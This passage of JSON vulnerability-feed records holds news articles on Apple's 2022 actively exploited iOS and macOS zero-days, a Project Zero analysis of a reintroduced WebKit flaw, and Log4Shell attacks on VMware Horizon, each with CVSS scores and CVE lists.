flaw](<https://thehackernews.com/2022/08/apple-releases-security-updates-to.html>) that Apple has remediated in less than a month.\n\nPatches are available in versions [iOS 15.7, iPadOS 15.7](<https://support.apple.com/en-us/HT213445>), [iOS 16](<https://support.apple.com/en-us/HT213446>), [macOS Big Sur 11.7](<https://support.apple.com/en-us/HT213443>), and [macOS Monterey 12.6](<https://support.apple.com/en-us/HT213444>). The iOS and iPadOS updates cover iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).\n\nWith the latest fixes, Apple has addressed seven actively exploited zero-day flaws and one publicly-known zero-day vulnerability since the start of the year -\n\n * [**CVE-2022-22587**](<https://thehackernews.com/2022/01/apple-releases-ios-and-ipados-updates.html>) (IOMobileFrameBuffer) \u2013 A malicious application may be able to execute arbitrary code with kernel privileges\n * [**CVE-2022-22594**](<https://thehackernews.com/2022/01/apple-releases-ios-and-ipados-updates.html>) (WebKit Storage) \u2013 A website may be able to track sensitive user information (publicly known but not actively exploited) \n * [**CVE-2022-22620**](<https://thehackernews.com/2022/02/apple-releases-ios-ipados-macos-updates.html>) (WebKit) \u2013 Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2022-22674**](<https://thehackernews.com/2022/03/apple-issues-patches-for-2-actively.html>) (Intel Graphics Driver) \u2013 An application may be able to read kernel memory\n * [**CVE-2022-22675**](<https://thehackernews.com/2022/03/apple-issues-patches-for-2-actively.html>) (AppleAVD) \u2013 An application may be able to execute arbitrary code with kernel privileges\n * [**CVE-2022-32893**](<https://thehackernews.com/2022/08/apple-releases-security-updates-to.html>) (WebKit) \u2013 Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2022-32894**](<https://thehackernews.com/2022/08/apple-releases-security-updates-to.html>) (Kernel) \u2013 An application may be able to execute arbitrary code with kernel privileges\n\nBesides CVE-2022-32917, Apple has plugged 10 security holes in iOS 16, spanning Contacts, Kernel Maps, MediaLibrary, Safari, and WebKit. The iOS 16 update is also notable for incorporating a new [Lockdown Mode](<https://thehackernews.com/2022/07/apples-new-lockdown-mode-protects.html>) that's designed to make zero-click attacks harder.\n\niOS further introduces a feature called [Rapid Security Response](<https://thehackernews.com/2022/06/apples-new-feature-will-install.html>) that makes it possible for users to automatically install security fixes on iOS devices without a full operating system update.\n\n\"Rapid Security Responses deliver important security improvements more quickly, before they become part of other improvements in a future software update,\" Apple said in a [revised support document](<https://support.apple.com/en-us/HT204204>) published on Monday.\n\nLastly, iOS 16 also brings support for [passkeys](<https://thehackernews.com/2022/05/google-to-add-passwordless.html>) in the Safari web browser, a passwordless sign-in mechanism that allows users to log in to websites and services by authenticating via Touch ID or Face ID.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-13T03:36:00", "type": "thn", "title": "Apple Releases iOS and macOS Updates to Patch Actively Exploited Zero-Day Flaw", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22587", "CVE-2022-22594", "CVE-2022-22620", "CVE-2022-22674", "CVE-2022-22675", "CVE-2022-32893", "CVE-2022-32894", "CVE-2022-32917"], "modified": "2022-09-14T04:13:45", "id": "THN:A60A19BF44B2CA75E63F31234992BE54", "href": "https://thehackernews.com/2022/09/apple-releases-ios-and-macos-updates-to.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-28T08:06:13", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEicrH886obh9SXVkYLlYlisP0KIsoT0qSHaXuhKykWpDFh1uMlJkZdzfpWXcSJXu-B1ctaTItaWBqJBVlJ_v4NGUD4ZLLwAO_beB0N6Uzay-2yDaaSv6jxj89Vx77ugTTYvW_tcsEXN2JEmVPoBtlwpDNsB1nldCeLT_hdp6cOLoHJUyepNmg_eJrZQ/s728-e100/apple.jpg>)\n\nTech giant Apple on Monday rolled out updates to remediate a zero-day flaw in iOS and iPadOS that it said has been actively exploited in the wild.\n\nThe weakness, given the identifier [CVE-2022-42827](<https://support.apple.com/en-us/HT213489>), has been described as an out-of-bounds write issue in the Kernel, which could be abused by a rogue application to execute arbitrary code with the highest privileges.\n\nSuccessful exploitation of [out-of-bounds write](<https://cwe.mitre.org/data/definitions/787.html>) flaws, which typically occur when a program attempts to write data to a memory location that's outside of the bounds of what it is allowed to access, can result in corruption of data, a crash, or execution of unauthorized code.\n\nThe iPhone maker said it addressed the bug with improved bounds checking, while crediting an anonymous researcher for reporting the vulnerability.\n\nAs is usually the case with actively exploited zero-day flaws, Apple refrained from sharing more specifics about the shortcoming other than acknowledging that it's \"aware of a report that this issue may have been actively exploited.\"\n\nCVE-2022-42827 is the third consecutive Kernel-related out-of-bounds memory vulnerability to be patched by Apple after [CVE-2022-32894](<https://thehackernews.com/2022/08/apple-releases-security-updates-to.html>) and [CVE-2022-32917](<https://thehackernews.com/2022/09/apple-releases-ios-and-macos-updates-to.html>), the latter two of which have also been previously reported to be weaponized in real-world attacks.\n\nThe security update is available for iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later.\n\nWith the latest fix, Apple has closed out eight actively exploited zero-day flaws and one publicly-known zero-day vulnerability since the start of the year -\n\n * [**CVE-2022-22587**](<https://thehackernews.com/2022/01/apple-releases-ios-and-ipados-updates.html>) (IOMobileFrameBuffer) \u2013 A malicious application may be able to execute arbitrary code with kernel privileges\n * [**CVE-2022-22594**](<https://thehackernews.com/2022/01/apple-releases-ios-and-ipados-updates.html>) (WebKit Storage) \u2013 A website may be able to track sensitive user information (publicly known but not actively exploited)\n * [**CVE-2022-22620**](<https://thehackernews.com/2022/02/apple-releases-ios-ipados-macos-updates.html>) (WebKit) \u2013 Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2022-22674**](<https://thehackernews.com/2022/03/apple-issues-patches-for-2-actively.html>) (Intel Graphics Driver) \u2013 An application may be able to read kernel memory\n * [**CVE-2022-22675**](<https://thehackernews.com/2022/03/apple-issues-patches-for-2-actively.html>) (AppleAVD) \u2013 An application may be able to execute arbitrary code with kernel privileges\n * [**CVE-2022-32893**](<https://thehackernews.com/2022/08/apple-releases-security-updates-to.html>) (WebKit) \u2013 Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2022-32894**](<https://thehackernews.com/2022/08/apple-releases-security-updates-to.html>) (Kernel) \u2013 An application may be able to execute arbitrary code with kernel privileges\n * [**CVE-2022-32917**](<https://thehackernews.com/2022/09/apple-releases-ios-and-macos-updates-to.html>) (Kernel) \u2013 An application may be able to execute arbitrary code with kernel privileges\n\nAside from CVE-2022-42827, the update also addresses 19 other security vulnerabilities, including two in Kernel, three in Point-to-Point Protocol (PPP), two in WebKit, and one each in AppleMobileFileIntegrity, Core Bluetooth, IOKit, Sandbox, and more.\n\n**_Update:_** Apple on Thursday backported fixes for the actively exploited iOS zero-day flaw (CVE-2022-42827) to older devices as part of [iOS and iPadOS 15.7.1](<https://support.apple.com/en-us/HT213490>) updates, along with patches for 17 other vulnerabilities.\n\nThe list of impacted devices consist of iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nThe tech giant also [revised the advisory](<https://support.apple.com/en-us/HT213489>) it issued earlier this week for iOS 16.1 and iPadOS 16 to include 15 more new flaws, including four issues in the Kernel and others in Apple Neural Engine, FaceTime, Graphics Driver, and zlib, taking the total number of fixes to 36.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-25T03:35:00", "type": "thn", "title": "Apple Releases Patch for New Actively Exploited iOS and iPadOS Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22587", "CVE-2022-22594", "CVE-2022-22620", "CVE-2022-22674", "CVE-2022-22675", "CVE-2022-32893", "CVE-2022-32894", "CVE-2022-32917", "CVE-2022-42827"], "modified": "2022-10-28T07:13:48", "id": "THN:4B97BCD00CAE89549A57EBFAECA484AE", "href": "https://thehackernews.com/2022/10/apple-releases-patch-for-new-actively.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-21T07:57:18", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiYhs0ipenD0AoL9V_aDGu9Ne59wQB4dVjm765OFf3mrjKTBnTs1wKWI7wEhojmYN1I7kb8uwSBREekjYU8iT0Vwm5Hyt1OKmgy_fleoHryLao0e7ASyt3c-RFQZr0hQPO7IMPscn9-BZbr_-cYqs7nuTB5CSFjV0CmokCbPxE6hFiOt5lshyEgS6bP/s728-e100/Google%20Researchers%20Detail%205-Year-Old%20Apple%20Safari%20Vulnerability%20Exploited%20in%20the%20Wild.jpg>)\n\nA security flaw in Apple Safari that was exploited in the wild earlier this year was originally fixed in 2013 and reintroduced in December 2016, according to a new report from Google Project Zero.\n\nThe issue, tracked as [CVE-2022-22620](<https://thehackernews.com/2022/02/apple-releases-ios-ipados-macos-updates.html>) (CVSS score: 8.8), concerns a case of a use-after-free vulnerability in the WebKit component that could be exploited by a piece of specially crafted web content to gain arbitrary code execution.\n\nIn early February 2022, Apple shipped patches for the bug across Safari, iOS, iPadOS, and macOS, while acknowledging that it \"may have been actively exploited.\"\n\n\"In this case, the variant was completely patched when the vulnerability was initially reported in 2013,\" Maddie Stone of Google Project Zero [said](<https://googleprojectzero.blogspot.com/2022/06/an-autopsy-on-zombie-in-wild-0-day.html>). \"However, the variant was reintroduced three years later during large refactoring efforts. The vulnerability then continued to exist for 5 years until it was fixed as an in-the-wild zero-day in January 2022.\"\n\nWhile both the [2013](<https://github.com/WebKit/WebKit/commit/4b3be1d3a8d22cb2b2f5ddb8299f7cd25a21cebf>) and [2022](<https://github.com/WebKit/WebKit/commit/aa31b6b4d09b09acdf1cec11f2f7f35bd362dd0e>) bugs in the [History API](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-22620.html>) are essentially the same, the paths to trigger the vulnerability are different. Then subsequent code changes undertaken years later revived the zero-day flaw from the dead like a \"zombie.\"\n\nStating the incident is not unique to Safari, Stone further stressed taking adequate time to audit code and patches to avoid instances of having to duplicate the fixes and understand the security impacts of the changes being carried out.\n\n\"Both the October 2016 and the December 2016 commits were very large. The commit in October changed 40 files with 900 additions and 1225 deletions. The commit in December changed 95 files with 1336 additions and 1325 deletions,\" Stone noted.\n\n\"It seems untenable for any developers or reviewers to understand the security implications of each change in those commits in detail, especially since they're related to lifetime semantics.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-20T10:10:00", "type": "thn", "title": "Google Researchers Detail 5-Year-Old Apple Safari Vulnerability Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-06-21T06:18:58", "id": "THN:9A9EADE3A5D4449C9E0519E22A93B306", "href": "https://thehackernews.com/2022/06/google-researchers-detail-5-year-old.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-14T04:09:16", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgoCPCCOzJCgi-nOCQAqAQg46fLbD3eNO6pq7T-DQyf-SX-6jNvv0GYdNkE5YYeQDG_SL2FaxnexqUnN1cSbFmVjD64JBZiBXR5gS5DtbrO6oC-wto8yG1Fl0sg39ZcM9suGiVjGMsXYhj2KUTDp0mmfES_LspF8eSX-JlZPR3C9Pv6cKyityz7MmKx/s728-e100/apple.png>)\n\nApple on Tuesday rolled out security updates to iOS, iPadOS, macOS, tvOS, and Safari web browser to address a new zero-day vulnerability that could result in the execution of malicious code.\n\nTracked as **CVE-2022-42856**, the issue has been described by the tech giant as a type confusion issue in the WebKit browser engine that could be triggered when processing specially crafted content, leading to arbitrary code execution.\n\nThe company said it's \"aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.1.\"\n\nWhile details surrounding the exact nature of the attacks are unknown as yet, it's likely that it involved a case of social engineering or a watering hole to infect the devices when visiting a rogue or legitimate-but-compromised domain via the browser.\n\nIt's worth noting that every third-party web browser that's available for iOS and iPadOS, including Google Chrome, Mozilla Firefox, and Microsoft Edge, and others, is [required](<https://www.macrumors.com/2022/02/25/should-apple-ban-rival-browser-engines/>) to use the WebKit rendering engine due to restrictions imposed by Apple.\n\nCredited with discovering and reporting the issue is Cl\u00e9ment Lecigne of Google's Threat Analysis Group (TAG). Apple noted it addressed the bug with improved state handling.\n\nThe update, which is available with [iOS 15.7.2, iPadOS 15.7.2](<https://support.apple.com/en-us/HT213531>), [macOS Ventura 13.1](<https://support.apple.com/en-us/HT213532>), [tvOS 16.2](<https://support.apple.com/en-us/HT213535>), and [Safari 16.2](<https://support.apple.com/en-us/HT213537>), arrives two weeks after Apple patched the same bug in [iOS 16.1.2](<https://support.apple.com/en-us/HT213516>) on November 30, 2022.\n\nThe fix marks the resolution of the tenth zero-day vulnerability discovered in Apple software since the start of the year. It's also the ninth actively exploited zero-day flaw in 2022 -\n\n * [**CVE-2022-22587**](<https://thehackernews.com/2022/01/apple-releases-ios-and-ipados-updates.html>) (IOMobileFrameBuffer) \u2013 A malicious application may be able to execute arbitrary code with kernel privileges\n * [**CVE-2022-22594**](<https://thehackernews.com/2022/01/apple-releases-ios-and-ipados-updates.html>) (WebKit Storage) \u2013 A website may be able to track sensitive user information (publicly known but not actively exploited)\n * [**CVE-2022-22620**](<https://thehackernews.com/2022/02/apple-releases-ios-ipados-macos-updates.html>) (WebKit) \u2013 Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2022-22674**](<https://thehackernews.com/2022/03/apple-issues-patches-for-2-actively.html>) (Intel Graphics Driver) \u2013 An application may be able to read kernel memory\n * [**CVE-2022-22675**](<https://thehackernews.com/2022/03/apple-issues-patches-for-2-actively.html>) (AppleAVD) \u2013 An application may be able to execute arbitrary code with kernel privileges\n * [**CVE-2022-32893**](<https://thehackernews.com/2022/08/apple-releases-security-updates-to.html>) (WebKit) \u2013 Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2022-32894**](<https://thehackernews.com/2022/08/apple-releases-security-updates-to.html>) (Kernel) \u2013 An application may be able to execute arbitrary code with kernel privileges\n * [**CVE-2022-32917**](<https://thehackernews.com/2022/09/apple-releases-ios-and-macos-updates-to.html>) (Kernel) \u2013 An application may be able to execute arbitrary code with kernel privileges\n * [**CVE-2022-42827**](<https://thehackernews.com/2022/10/apple-releases-patch-for-new-actively.html>) (Kernel) \u2013 An application may be able to execute arbitrary code with kernel privileges\n\nThe latest [iOS, iPadOS](<https://support.apple.com/en-us/HT213530>), and [macOS](<https://support.apple.com/en-us/HT213532>) updates also introduce a new security feature called [Advanced Data Protection for iCloud](<https://thehackernews.com/2022/12/apple-boosts-security-with-new-imessage.html>) that expands end-to-end encryption (E2EE) to \u200ciCloud\u200c Backup, Notes, Photos, and more.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-14T03:44:00", "type": "thn", "title": "New Actively Exploited Zero-Day Vulnerability Discovered in Apple Products", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22587", "CVE-2022-22594", "CVE-2022-22620", "CVE-2022-22674", "CVE-2022-22675", "CVE-2022-32893", "CVE-2022-32894", "CVE-2022-32917", "CVE-2022-42827", "CVE-2022-42856"], "modified": "2022-12-14T04:00:30", "id": "THN:EC350D7E2CF02EC9CB76AA85E0D3F47A", "href": "https://thehackernews.com/2022/12/new-actively-exploited-zero-day.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-25T04:06:05", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhCWMbXjpEIYZVQ_1kcBejV2yvIUEVDZUmbtChK5kDR3yOQHgw7xzF_5fMXJO8OtB4JREMoYl1LUKH-FA9op00z4Fg_lHIkRoez3GmCtRczFALlUcCc1cZ9hxyX-5KgGtx6lkx78rKcTbgSh12yw68XHad2FmQ5kR6NXRfjeQRjz_jcr5-Fyy43RNGy/s728/hacking-malware-ads.jpg>)\n\nApple on Wednesday released security updates for [iOS, iPadOS](<https://support.apple.com/en-us/HT213412>), and [macOS](<https://support.apple.com/en-us/HT213413>) platforms to remediate two zero-day vulnerabilities previously exploited by threat actors to compromise its devices.\n\nThe list of issues is below -\n\n * **CVE-2022-32893** \\- An out-of-bounds write issue in WebKit which could lead to the execution of arbitrary code by processing a specially crafted web content\n * **CVE-2022-32894** \\- An out-of-bounds write issue in the operating system's Kernel that could be abused by a malicious application to execute arbitrary code with the highest privileges\n\nApple said it addressed both the issues with improved bounds checking, adding it's aware the vulnerabilities \"may have been actively exploited.\"\n\nThe company did not disclose any additional information regarding these attacks or the identities of the threat actors perpetrating them, although it's likely that they were abused as part of highly-targeted intrusions.\n\nThe latest update brings the total number of actively exploited zero-days patched by Apple to six since the start of the year -\n\n * [**CVE-2022-22587**](<https://thehackernews.com/2022/01/apple-releases-ios-and-ipados-updates.html>) (IOMobileFrameBuffer) \u2013 A malicious application may be able to execute arbitrary code with kernel privileges\n * [**CVE-2022-22620**](<https://thehackernews.com/2022/02/apple-releases-ios-ipados-macos-updates.html>) (WebKit) \u2013 Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2022-22674**](<https://thehackernews.com/2022/03/apple-issues-patches-for-2-actively.html>) (Intel Graphics Driver) \u2013 An application may be able to read kernel memory\n * [**CVE-2022-22675**](<https://thehackernews.com/2022/03/apple-issues-patches-for-2-actively.html>) (AppleAVD) \u2013 An application may be able to execute arbitrary code with kernel privileges\n\nBoth the vulnerabilities have been fixed in iOS 15.6.1, iPadOS 15.6.1, and macOS Monterey 12.5.1. The iOS and iPadOS updates are available for iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).\n\n**_Update:_** Apple on Thursday released a [security update](<https://support.apple.com/en-us/HT213414>) for Safari web browser (version 15.6.1) for macOS Big Sur and Catalina to patch the WebKit vulnerability fixed in macOS Monterey.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-18T03:08:00", "type": "thn", "title": "Apple Releases Security Updates to Patch Two New Zero-Day Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22587", "CVE-2022-22620", "CVE-2022-22674", "CVE-2022-22675", "CVE-2022-32893", "CVE-2022-32894"], "modified": "2022-10-25T03:24:38", "id": "THN:DEAEC76D89D5583101E2E6036C289609", "href": "https://thehackernews.com/2022/08/apple-releases-security-updates-to.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:44", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgvDZwAvn3cgUi_f3vxBMVikb6ovW0qHC4JUcgJIDgrR-bZtLcWA-DuDUESrnzwlMPy5XnlvllCfYWLP0ItGPUmZE74JhP2EDfe2PfF9Mdw7NvA1YE5MCkG-2t3FkvdqxmnCqRQjXifFbfSO2x0QSfvmBwzdJPOvhe22mxbmWhBpSWmZgIBCgpD0MjI>)\n\nThe digital security team at the U.K. National Health Service (NHS) has raised the alarm on active exploitation of Log4Shell vulnerabilities in unpatched [VMware Horizon](<https://www.vmware.com/products/horizon.html>) servers by an unknown threat actor to drop malicious web shells and establish persistence on affected networks for follow-on attacks.\n\n\"The attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory InterfaceTM (JNDI) via Log4Shell payloads to call back to malicious infrastructure,\" the non-departmental public body [said](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>) in an alert. \"Once a weakness has been identified, the attack then uses the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service.\"\n\nThe web shell, once deployed, can serve as a conduit to carry out a multitude of post-exploitation activities such as deploying additional malicious software, data exfiltration, or deployment of ransomware. VMware Horizon versions 7.x and 8.x are vulnerable to the Log4j vulnerabilities.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEiQZlFBiTCDw52oclkWnjMIJ4v4BdC7aS_jWnpdRdwKdhYFmpJ-482rUQYunlJpkw3q-qsVcoe33QDomLPJAYXW8chL_4Xv-Pj9exnGpxQJW4kPs8w4GGUVLCABKX72ljfTrILX-aCltAwge-FPu1Ew6Zd3kTM9FzGmlK3BSjH2GIdZArZOqDJTY4NM>)\n\n[Log4Shell](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>) is an exploit for CVE-2021-44228 (CVSS score: 10.0), a critical arbitrary remote code execution flaw in Apache Log4j 2, an ubiquitous open-source logging framework, which has been put to use as part of [different malware campaigns](<https://thehackernews.com/2022/01/microsoft-warns-of-continued-attacks.html>) since it came to light in December 2021. An array of hacking groups, ranging from nation-state actors to ransomware cartels, have pounced on the vulnerability to date.\n\nThe development also marks the second time VMware products have come under exploitation stemming as a result of vulnerabilities in the Log4j library. Last month, AdvIntel researchers [disclosed](<https://thehackernews.com/2021/12/apache-issues-3rd-patch-to-fix-new-high.html>) that attackers were targeting systems running VMware VCenter servers with the aim of installing Conti ransomware.\n\nVMware, for its part, has already [released security updates](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>) for Horizon, VCenter, and other products last month that have been impacted by Log4Shell, with the virtualization services provider acknowledging scanning attempts in the wild, urging customers to install the patches where applicable or apply workarounds temporarily to counter any potential risk.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-08T07:04:00", "type": "thn", "title": "NHS Warns of Hackers Targeting Log4j Flaws in VMware Horizon", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-08T07:04:51", "id": "THN:833B2B9623F1C64D20868B947E8BE4E0", "href": "https://thehackernews.com/2022/01/nhs-warns-of-hackers-targeting-log4j.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-27T04:02:40", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhcT1Fv3_9rsWlJzhYEIc-aAf9DOwYWzurFH08RJVRsBNbmiY8efhEcIvJyEPNszIO_Es3Qa8qrlkIe_2A8Ziwxt_V_wM0A3qpxu5qh2cf9s4t_Puk9yEF3slcIwsM2S026HFXf7jWvQPqzqLfN5gNap14AfolPz7hnTurOQpVqlWN9dvNZN6GQJPo5/s728-e100/iran-hackers.jpg>)\n\nIranian state-sponsored actors are leaving no stone unturned to exploit unpatched systems running Log4j to target Israeli entities, indicating the vulnerability's [long 